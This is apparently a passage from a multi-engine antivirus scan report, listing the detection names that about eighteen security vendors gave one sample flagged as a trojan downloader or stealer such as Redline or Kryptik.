Jiangmin TrojanDownloader.Deyma.arg
Varist W32/Kryptik.JKR.gen!Eldorado
Avira TR/Kryptik.ofzuw
Antiy-AVL Trojan/Win32.Tiggre
Gridinsoft Spy.Win32.Redline.lu!heur
ZoneAlarm HEUR:Trojan.Win32.Injuke.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
ALYac Trojan.GenericKD.69761066
Malwarebytes Generic.Malware.AI.DDS
Zoner Trojan.Win32.162634
TrendMicro-HouseCall TROJ_GEN.R002H0CJN23
Tencent Trojan.Win32.GenKryptik.kp
Yandex Trojan.DL.Agent_AGen!wW6Q+u2H4PU
Ikarus Trojan.Spy.Stealer
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Kryptik.HUKQ!tr
AVG Win32:Evo-gen [Trj]